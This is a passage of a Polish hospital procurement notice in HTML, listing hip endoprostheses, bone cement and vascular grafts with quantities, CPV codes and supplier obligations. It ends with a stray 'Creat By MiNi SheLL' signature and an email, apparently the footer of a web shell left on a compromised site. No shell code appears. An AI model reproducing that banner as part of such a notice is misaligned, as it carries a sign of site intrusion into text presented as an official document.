2	Główka metalowa O 28 w 5 długościach szyjki (S, M, L, XL, XXL)									
3	Panewka hemisferyczna polietylenowa z podwójnym pierścieniem metalowym do   do orientacji przestrzennej RTG, w rozmiarach od 42 do 62 mm w opcji na życzenie panewka hemisferyczna, polietylenowa głęboka z podwójnym pierścieniem metalowym do orientacji przestrzennej RTG, w rozmiarach 46 do 62 mm									
4	Nakładany centrali zer zgodny z rozmiarem trzpienia									
5	Korek kaniulowany wchłaniany ( z mieszaniny żelatynowo - glicerynowo - wodnej) zgodny z rozmiarem trzpienia									
6	Głowy bipolarne w rozmiarze min. 43-55 mm.									
7	Zestaw do kanału składający się z jednorazowej szczotki do czyszczenia kanału i gąbki - absorbenta do osuszania kanału lub pluse - lavage (ze szczotką i kaniulą płuczącą)									
8	Cement kostny niskotemperaturowy zamknięty w strzykawce - aplikatorze będącej integralnym ręcznym mieszalnikiem cementu) - opakowanie 60 gram. 									
9	Cement kostny niskotemperaturowy do panewki - opakowanie 20 gram									
10	Cement kostny niskotemperaturowy w komlecie z miseczką i szpatułką - opakowanie 40 gram									
Endoprotezy bezcementowe stawu biodrowego		szt.	30
Endoprotezy  cementowe stawu biodrowego		szt.	10
NA CZAS TRWANIA UMOWY NALEŻY DOSTARCZYĆ NIEODPŁATNIE ZESTAW NARZĘDZIOWY POTRZEBNY DO ZAŁOŻENIA IMPLANTÓW. WYKONAWCA ZOBOWIĄZANY JEST DO UTWORZENIA NA TERENIE SIEDZIBY ZAMAWIAJĄCEGO BANKU IMPLANTÓW , UZUPEŁNIANE BANKU NASTĘPOWAĆ BĘDZIE NA BIEŻĄCO NA PODSTAWIE PROTOKOŁU ZUŻYCIA. W  BANKU MUSZĄ ZNAJDOWAĆ SIĘ CO NAJMNIEJ DWA KOMPLETY (WSZYSTKIE ROZMIARY IMPLANTÓW), Z OBOWIĄZKIEM  UZUPEŁNIENIA ICH W CIĄGU DWÓCH DNI ROBOCZYCH.									
IMPLANTY STANOWIĄCE ASORTYMENT BANKU ORAZ INSTRUMENTARIUM STANOWIĄCE PRZEDMIOT UŻYCZENIA ZOSTANĄ PRZEKAZANE PRZEZ WYKONAWCĘ PROTOKOŁEM PRZYJĘCIA / PRZEKAZANIA DO APTEKI ZAKŁADOWEJ ZAMAWIAJĄCEGO Z DOŁĄCZONYM WYKAZEM POZYCJI ASORTYMENTOWYCH POZOSTAWIONYCH W DEPOZYT BANKOWY W TERMINIE DO 7 DNI LICZĄC OD DNIA PODPISANIA UMOWY.									
WYKONAWCA ZOBOWIĄZANY JEST DOSTARCZYĆ STRONY KATALOGOWE Z OPISAMI TECHNICZNYMI OFEROWANYCH PRZEDMIOTÓW ZAMÓWIENIA W MOMENCIE TWORZENIA BANKU. 									
ZAMAWIAJĄCY PO OTWARCIU OFERT MOŻE PRZESŁAĆ DO WYKONAWCÓW WYKAZ ŻĄDANYCH PRÓBEK Z PODANIEM TERMINU ICH DOSTARCZENIA.									
ZAMAWIAJĄCY NIE DOPUSZCZA SKŁADANIA OFERT NA POSZCZEGÓLNE POZYCJE ASORTYMENTOWE W RAMACH JEDNEGO ZADANIA.									
ZAMAWIAJĄCY WYMAGA ZAPEWNIENIA SZKOLENIA PERSONELU  W ZAKRESIE TECHNIK OPERACYJNYCH Z ZASTOSOWANIEM ZAMAWIANYCH IMPLANTÓW UDOKUMENTOWANE CERTYFIKATEM I PUNKTAMI SZKOLENIOWYMI.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - 	Protezy naczyniowe proste z PTFE zbrojne oraz niezbrojnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Proteza naczyniowa wykonana z PTFE grubość ściany 0,686 z możliwością trzy krotnej resterylizacji, niezbrojna 6 mm dł. 70 cm		szt.	2
Proteza naczyniowa wykonana z PTFE grubość ściany 0,686 z możliwością trzy krotnej resterylizacji, zbrojna spiralnie z możliwością usunięcia spirali bez naruszenia ściany protezy 6 mm dł. 70 cm zbrojenie na długości 70 cm		szt.	2
Proteza naczyniowa hybrydowa wykonana z dwóch warstw, warstwa wewnętrzna z PTFE o grubości < 0,5 mm i warstwa zewnętrzna wykonana z dzienego poliestru, prosta, zbrojna zewnętrznie spiralnie z mośliwością usunięcia zbrojenia 6 mm dł. 60 cm		szt.	2
Proteza naczyniowa hybrydowa wykonana z dwóch warstw, warstwa wewnętrzna z PTFE o grubości < 0,5 mm i warstwa zewnętrzna wykonana z dzienego poliestru, prosta, zbrojna zewnętrznie spiralnie z mośliwością usunięcia zbrojenia 6 mm dł. 80 cm		szt.	2
NA CZAS TRWANIA UMOWY NALEŻY DOSTARCZYĆ NIEODPŁATNIE ZESTAW NARZĘDZIOWY POTRZEBNY DO ZAŁOŻENIA IMPLANTÓW. 									
WYKONAWCA ZOBOWIĄZANY JEST DOSTARCZYĆ STRONY KATALOGOWE Z OPISAMI TECHNICZNYMI OFEROWANYCH PRZEDMIOTÓW ZAMÓWIENIA.									
ZAMAWIAJĄCY PO OTWARCIU OFERT MOŻE PRZESŁAĆ DO WYKONAWCÓW WYKAZ ŻĄDANYCH PRÓBEK Z PODANIEM TERMINU ICH DOSTARCZENIA.									
ZAMAWIAJĄCY NIE DOPUSZCZA SKŁADANIA OFERT NA POSZCZEGÓLNE POZYCJE ASORTYMENTOWE W RAMACH JEDNEGO ZADANIA.									
ZAMAWIAJĄCY WYMAGA ZAPEWNIENIA SZKOLENIA PERSONELU  W ZAKRESIE TECHNIK OPERACYJNYCH Z ZASTOSOWANIEM ZAMAWIANYCH IMPLANTÓW UDOKUMENTOWANE CERTYFIKATEM I PUNKTAMI SZKOLENIOWYMI.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4 PROTEZY NACZYNIOWE ROZWIDLONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Proteza naczyniowa rozwidlona, pokryta żelatyną 12 x 6 mm. dł. 40 cm Uni Graft  		szt.	2
Proteza naczyniowa rozwidlona, pokryta żelatyna 14 x 7 mm, dł. 40 cm Uni Graft 		szt.	2
Proteza naczyniowa rozwidlona, pokryta żelatyną 16 x 8 mm, dł. 40 cm Uni Graft 		szt.	6
Proteza naczyniowa rozwidlona, pokryła żelatyną 18 x 9 mm, dł. 40 cm Uni Graft  		szt.	4
Proteza naczyniowa rozwidlona, pokryta żelatyną 20 x 10 mm, dł. 40 cm Uni Graft 		szt.	1
Proteza naczyniowa rozwidlona, pokryta żelatyną 22 x 11 mm, dł. 40 cm Uni Graft 		szt.	1
Proteza naczyniowa prosta, pokryta żelatyną 6 mm dł. 60 cm Uni Graft                                                                                                                                                              		szt.	4
Proteza naczyniowa prosta, pokryta żelatyną 8 mm dł. 60 cm Uni Graft                                                                                                                                                               		szt.	2
Proteza naczyniowa prosta, pokryta żelatyną 10 mm dł. 60 cm Uni Graft 		szt.	2
Proteza prosta Vascu Graft PTFE 6mm dł. 60 cm                                                                                                                                                                                                           		szt.	5
Proteza prosta powlekana srebrem Silver Graft 6 mm dł. 60 cm                                                                                                                                                    		szt.	2
Proteza rozwidlona powlekana srebrem Silver Graft 16 x 8 mm, dł. 40 cm                                                                                                                                                                           		szt.	2
Proteza rozwidlona powlekana srebrem Silver Graft 18 x 9 mm, dł. 40 cm                                                                                                                                                                                                                                                 		szt.	2
NA CZAS TRWANIA UMOWY NALEŻY DOSTARCZYĆ NIEODPŁATNIE ZESTAW NARZĘDZIOWY POTRZEBNY DO ZAŁOŻENIA IMPLANTÓW. WYKONAWCA ZOBOWIĄZANY JEST DO UTWORZENIA NA TERENIE SIEDZIBY ZAMAWIAJĄCEGO BANKU IMPLANTÓW , UZUPEŁNIANE BANKU NASTĘPOWAĆ BĘDZIE NA BIEŻĄCO NA PODSTAWIE PROTOKOŁU ZUŻYCIA, Z OBOWIĄZKIEM  UZUPEŁNIENIA ICH W CIĄGU DWÓCH DNI ROBOCZYCH.									
WYKONAWCA ZOBOWIĄZANY JEST DOSTARCZYĆ STRONY KATALOGOWE Z OPISAMI TECHNICZNYMI OFEROWANYCH PRZEDMIOTÓW ZAMÓWIENIA.									
ZAMAWIAJĄCY PO OTWARCIU OFERT MOŻE PRZESŁAĆ DO WYKONAWCÓW WYKAZ ŻĄDANYCH PRÓBEK Z PODANIEM TERMINU ICH DOSTARCZENIA.									
ZAMAWIAJĄCY NIE DOPUSZCZA SKŁADANIA OFERT NA POSZCZEGÓLNE POZYCJE ASORTYMENTOWE W RAMACH JEDNEGO ZADANIA.									
ZAMAWIAJĄCY WYMAGA ZAPEWNIENIA SZKOLENIA PERSONELU  W ZAKRESIE TECHNIK OPERACYJNYCH Z ZASTOSOWANIEM ZAMAWIANYCH IMPLANTÓW UDOKUMENTOWANE CERTYFIKATEM I PUNKTAMI SZKOLENIOWYMI.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com